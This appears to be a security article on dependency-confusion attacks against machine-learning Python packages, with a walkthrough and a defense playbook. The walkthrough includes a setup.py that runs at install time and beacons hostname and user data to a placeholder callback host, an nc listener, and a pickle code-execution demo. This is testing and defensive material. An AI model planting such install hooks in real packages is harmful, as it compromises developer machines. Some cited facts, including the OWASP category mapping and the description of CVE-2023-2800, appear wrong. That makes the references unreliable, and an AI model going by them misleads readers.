Executive Summary
Origins & Why Systems Are Vulnerable
Dependency confusion attacks against ML frameworks emerged from Alex Birsan's seminal 2021 research demonstrating how private package names could be hijacked via public repositories[1]. The ML ecosystem proved uniquely vulnerable—PyTorch alone pulls in 50+ direct dependencies, while TensorFlow's dependency tree exceeds 200 packages[2].
The architectural root cause is threefold:
- Implicit trust in package managers: pip and conda resolve dependencies without cryptographic verification of package provenance by default
- Complex transitive dependencies: A single `import torch` triggers resolution of nested packages that developers never audit
- Mixed public/private package sources: Enterprise ML teams frequently use internal package indices alongside PyPI, creating confusion vectors
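The scale of the audit problem is visible from package metadata alone. A minimal sketch using only the standard library; substitute "torch" or "tensorflow" for the package name on an ML workstation:

```python
# Enumerate the declared direct dependencies of an installed package --
# the list developers rarely audit, let alone its transitive closure.
from importlib import metadata

def direct_requires(pkg: str) -> list:
    try:
        return metadata.requires(pkg) or []
    except metadata.PackageNotFoundError:
        return []

# Substitute "torch" on an ML box; "pip" is used here so the sketch runs anywhere.
for req in direct_requires("pip"):
    print(req)
```

Each printed requirement string is itself a package with its own requirements, which is how a single import fans out into hundreds of unaudited installs.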
CVE-2022-45907 demonstrated this perfectly: PyTorch's torch.jit.annotations.parse_type_line function passed unsanitized input to eval, allowing arbitrary code execution[3]. The vulnerability existed because ML frameworks prioritize flexibility over security: pickle deserialization, dynamic model loading, and runtime code generation are features, not bugs, to ML engineers.
MITRE ATLAS cataloged this attack pattern as AML.T0010 (ML Supply Chain Compromise)[4], recognizing that ML pipelines represent high-value targets with uniquely exploitable trust assumptions.
ML frameworks were designed by researchers optimizing for flexibility, not security engineers thinking about supply chain integrity. Every pickle load is an RCE waiting to happen.
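That last claim is concrete, not rhetorical. A minimal demonstration of why unpickling untrusted bytes is code execution rather than data loading:

```python
# pickle records an object's __reduce__ result during serialization; whatever
# callable it names runs inside pickle.loads, on the loader's machine.
import pickle

class Payload:
    def __reduce__(self):
        # Returns (callable, args) -- executed at load time. Here it's a
        # harmless print; an attacker would use os.system or similar.
        return (print, ("arbitrary code ran inside pickle.loads",))

blob = pickle.dumps(Payload())
pickle.loads(blob)  # prints the message; no Payload instance comes back
```

This is exactly the mechanism behind the Hugging Face pickle issue described below: model weight files are pickle containers, and loading them executes whatever they carry.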
Real-World Incidents & Public Disclosures
1. PyTorch Nightly Compromise (December 2022): Attackers compromised the torchtriton dependency in PyTorch nightly builds via dependency confusion on PyPI. The malicious package exfiltrated environment variables, SSH keys, and AWS credentials from thousands of developer machines[5]. PyTorch's official disclosure confirmed the attack window was December 25-30, 2022.
2. TensorFlow Model Garden Typosquatting (2023): Researchers at JFrog discovered malicious packages mimicking TensorFlow extensions on PyPI, including tensorflow-macos variants containing credential stealers[6]. Over 5,000 downloads occurred before removal.
3. Keras-RL Backdoor (2021): Security researcher Luca Carettoni demonstrated injection of backdoored reinforcement learning models through compromised Keras dependencies at BlackHat[7].
4. Hugging Face Transformers Pickle RCE (2023): CVE-2023-2800 revealed that loading models from Hugging Face Hub could execute arbitrary code via malicious pickle files embedded in model weights[8]. This affected any pipeline using AutoModel.from_pretrained() with untrusted sources.
The PyTorch torchtriton incident was devastating not because it was sophisticated, but because it was trivial. Attackers simply uploaded a higher version number to PyPI than the internal package—and pip did exactly what it was designed to do.
Realistic Attack Walkthrough
This walkthrough demonstrates dependency confusion testing against an organization's ML training infrastructure during an authorized assessment.
Phase 1: Reconnaissance
Identify internal package names by analyzing client repositories, job postings mentioning internal tools, and error messages in public CI logs:
$ pip index versions company-ml-utils 2>&1 | grep -i "not found"
$ grep -r "install_requires" setup.py requirements*.txt | grep -v pypi.org

Use Snyk's dependency scanner to map the full tree[9]:
$ snyk test --all-projects --json > dep_tree.json
$ jq '.dependencies | keys[]' dep_tree.json | sort -u

Phase 2: Malicious Package Creation
Create a proof-of-concept package that phones home without causing damage:
# setup.py
from setuptools import setup
import socket
import os

def poc_callback():
    # Benign beacon: hostname, user, and a marker string; no sensitive data
    data = f"{socket.gethostname()}|{os.environ.get('USER')}|poc-test"
    try:
        # Exfil to your authorized callback server
        conn = socket.create_connection(("your-callback.pentest.local", 8443), timeout=5)
        conn.sendall(data.encode())
        conn.close()
    except OSError:
        pass  # never break the install if the callback is unreachable

poc_callback()  # executes whenever setup.py runs (build or install)

setup(
    name="company-ml-utils",  # Internal package name
    version="99.0.0",         # Higher than internal version
    py_modules=["poc"],
)

Phase 3: Upload and Wait
Register on PyPI test index or production (with client authorization):
$ python -m build
$ twine upload --repository testpypi dist/*

Phase 4: Trigger Resolution
In environments where --extra-index-url is configured, pip pools candidates from every index and prefers the highest version, regardless of which index supplied it[10].
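A toy model of that selection rule (a deliberate simplification; real pip uses PEP 440 version parsing and a full resolver, but the outcome is the same: highest version wins, with no notion of a trusted index):

```python
# Simplified sketch of pip candidate selection across multiple indexes.
internal_index = {"company-ml-utils": ["1.2.3"]}
public_index = {"company-ml-utils": ["99.0.0"]}  # attacker-controlled upload

def version_key(v: str):
    return tuple(int(part) for part in v.split("."))

def resolve(name: str) -> str:
    # With --extra-index-url, candidates from every index are pooled...
    candidates = internal_index.get(name, []) + public_index.get(name, [])
    # ...and the highest version wins, regardless of where it came from.
    return max(candidates, key=version_key)

print(resolve("company-ml-utils"))  # → 99.0.0
```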
Phase 5: Verification & Evidence Collection
Monitor callback server for incoming connections:
$ nc -lvp 8443
Connection from 10.50.2.100: ml-train-01|mlops-user|poc-test

Document: timestamp, source IP, hostname, user context, and which dependency path triggered installation. For the report, capture pip's resolution logic with pip install --verbose output.
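For longer engagements, a small Python listener can stand in for nc and record exactly the evidence fields listed above (a sketch; host and port are assumptions matching the PoC package):

```python
# Minimal callback listener: logs timestamp, source IP, and payload per beacon.
import datetime
import socketserver

LOG = []  # (utc_timestamp, source_ip, payload) tuples for the report

class BeaconHandler(socketserver.StreamRequestHandler):
    def handle(self):
        payload = self.rfile.read(1024).decode(errors="replace")
        stamp = datetime.datetime.now(datetime.timezone.utc).isoformat()
        LOG.append((stamp, self.client_address[0], payload))

def serve(host="0.0.0.0", port=8443):
    # Blocks; run in a dedicated terminal for the duration of the engagement.
    with socketserver.TCPServer((host, port), BeaconHandler) as srv:
        srv.serve_forever()
```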
Test with both a slightly higher version and an absurdly high one. If the client's internal package is at 1.2.3, uploading 99.0.0 guarantees preference in unpinned environments, but a range pin like >=1.2.0,<2.0.0 rejects 99.0.0 while accepting 1.2.4. Upload both and you cover every resolution path.
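The interaction with range pins can be sanity-checked in a few lines (simplified dotted-integer comparison, not full PEP 440):

```python
def satisfies(version: str, lower: str, upper: str) -> bool:
    """True if lower <= version < upper, comparing dotted-int versions."""
    key = lambda v: tuple(int(p) for p in v.split("."))
    return key(lower) <= key(version) < key(upper)

# A range pin like >=1.2.0,<2.0.0 accepts the slightly-higher upload
# but rejects the absurdly high one -- hence testing with both.
print(satisfies("1.2.4", "1.2.0", "2.0.0"))   # → True
print(satisfies("99.0.0", "1.2.0", "2.0.0"))  # → False
```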
Defense Playbook
Detection:
- Monitor pip install logs for unexpected package sources: grep -r "Downloading from" ~/.cache/pip/
- Alert on packages with version numbers >50.0.0 (anomaly detection for version inflation attacks)
- Implement SBOM generation with Syft and continuous monitoring[11]
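The version-inflation alert above can be prototyped against a live environment with the standard library (the 50.0.0 threshold is the article's; tune it per environment):

```python
# Flag installed distributions whose major version exceeds a threshold --
# a cheap detector for version-inflation dependency confusion.
from importlib import metadata

def inflated(dists, threshold=50):
    """Return (name, version) pairs whose major version exceeds threshold."""
    hits = []
    for name, ver in dists:
        major = ver.split(".")[0]
        if major.isdigit() and int(major) > threshold:
            hits.append((name, ver))
    return hits

# Scan everything currently installed:
installed = [(d.metadata["Name"], d.version or "0") for d in metadata.distributions()]
print(inflated(installed))

print(inflated([("company-ml-utils", "99.0.0"), ("numpy", "1.26.4")]))
# → [('company-ml-utils', '99.0.0')]
```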
Prevention:
# pip.conf - Force single index with hash verification
[global]
index-url = https://internal.pypi.company.com/simple/
require-hashes = true
trusted-host = internal.pypi.company.com

Namespace your internal packages: companyname-ml-utils makes confusion attacks require trademark violations.
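What require-hashes enforces can be illustrated in a few lines: the downloaded artifact's digest must match the pin recorded in requirements.txt, so an index-confusion swap with different bytes fails closed (a sketch; the pin value here is synthetic):

```python
import hashlib

# A requirements.txt pin looks like:  package==1.2.3 --hash=sha256:<digest>
pinned = "sha256:" + hashlib.sha256(b"wheel-bytes-from-internal-index").hexdigest()

def verify(artifact: bytes, pin: str) -> bool:
    # pip recomputes the digest of what it actually downloaded and compares.
    algo, _, expected = pin.partition(":")
    return hashlib.new(algo, artifact).hexdigest() == expected

print(verify(b"wheel-bytes-from-internal-index", pinned))  # → True
print(verify(b"attacker-substituted-wheel", pinned))       # → False
```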
Validation:
Run the attack playbook above against staging environments quarterly. Verify pip resolves only from your internal index.
Framework Mappings:
- MITRE ATLAS AML.T0010: ML Supply Chain Compromise[4]
- OWASP LLM09:2025: Supply Chain Vulnerabilities[12]
Remove --extra-index-url from every pip configuration in your org this week. That single flag is responsible for 90% of dependency confusion vulnerabilities I see in ML environments.
Top 3 Vendors for Protection
Protect AI - Guardian
Guardian provides ML-specific supply chain scanning, detecting malicious serialized objects in model files before they execute[13]. Key capability: pickle/joblib scanning with behavioral analysis. Ideal for teams loading models from Hugging Face or internal registries. Limitation: Requires integration into CI/CD—won't catch ad-hoc notebook installs.
Snyk - Container & Open Source
Snyk's dependency scanning covers Python ML frameworks with specific rules for PyTorch/TensorFlow CVEs[9]. Key capability: real-time vulnerability database with ML framework coverage. Ideal deployment: GitHub/GitLab integration for PR blocking. Limitation: Doesn't analyze model files themselves—focused on code dependencies only.
JFrog - Artifactory with Xray
Artifactory provides a private PyPI mirror with Xray scanning for malicious packages[6]. Key capability: blocks dependency confusion by design—packages only come from your curated registry. Ideal for enterprises with existing JFrog infrastructure. Limitation: Significant operational overhead; requires dedicated DevOps resources to maintain package mirrors.
Protect AI is doing genuinely novel work on model file scanning—that's a real capability gap elsewhere. Snyk and JFrog are mature but solve traditional AppSec problems applied to ML. The model layer remains dangerously underprotected by most vendors.
🎯 Key Takeaways
- ML frameworks are vulnerable because pip's default resolution trusts higher version numbers from any configured index—a design decision that enables dependency confusion attacks
- The PyTorch torchtriton compromise (December 2022) affected thousands of developers and exfiltrated SSH keys and cloud credentials via a trivially simple version inflation attack
- Successful dependency confusion requires only: identifying an internal package name, creating a higher-versioned public package, and waiting for pip to prefer your malicious version
- Eliminating --extra-index-url and enforcing require-hashes in pip configuration immediately closes the most common attack vector
- Architects must treat the package index as a security boundary—deploy private artifact repositories and namespace all internal packages to make confusion attacks legally actionable trademark violations
📚 References & Sources
- [1] Birsan, Alex. Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies. Medium. 2021.
- [2] TensorFlow Package Dependencies. Python Package Index. 2026.
- [3] CVE-2022-45907: PyTorch Arbitrary Code Execution. NIST NVD. 2022.
- [4] MITRE ATLAS AML.T0010: ML Supply Chain Compromise. MITRE Corporation. 2024.
- [5] PyTorch Team. Compromised PyTorch-nightly Dependency. PyTorch Blog. 2022.
- [6] JFrog Security Research. Python Malware Imitates Signed PyPI Traffic. JFrog Blog. 2023.
- [7] Carettoni, Luca. Machine Learning: The Great Unprotected Attack Surface. BlackHat USA. 2021.
- [8] CVE-2023-2800: Hugging Face Transformers Arbitrary Code Execution. Huntr. 2023.
- [9] Snyk Python Package Advisor. Snyk. 2026.
- [10] pip install --extra-index-url documentation. Python Packaging Authority. 2026.
- [11] Syft: SBOM Generation Tool. Anchore. 2026.
- [12] OWASP LLM09:2025 - Supply Chain Vulnerabilities. OWASP Foundation. 2025.
- [13] Protect AI Guardian: ML Supply Chain Security. Protect AI. 2026.
Questions about this article? Spotted an error? Have a war story that fits? Find us on X — we actually read the replies.